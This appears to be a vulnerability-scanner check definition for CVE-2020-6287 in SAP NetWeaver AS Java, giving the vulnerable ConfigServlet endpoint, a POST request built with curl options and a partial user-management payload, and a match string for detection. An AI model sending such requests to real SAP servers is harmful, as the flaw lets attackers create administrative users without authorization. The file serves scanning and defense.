AUTHOR='@xer0dayz' VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA' URI="/CTCWebService/CTCWebServiceBean/ConfigServlet" METHOD='POST' MATCH="CTCWebServiceSi" SEVERITY='P1 - CRITICAL' CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data 'sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('data')}}userDetails'" SECONDARY_COMMANDS='' GREP_OPTIONS='-i'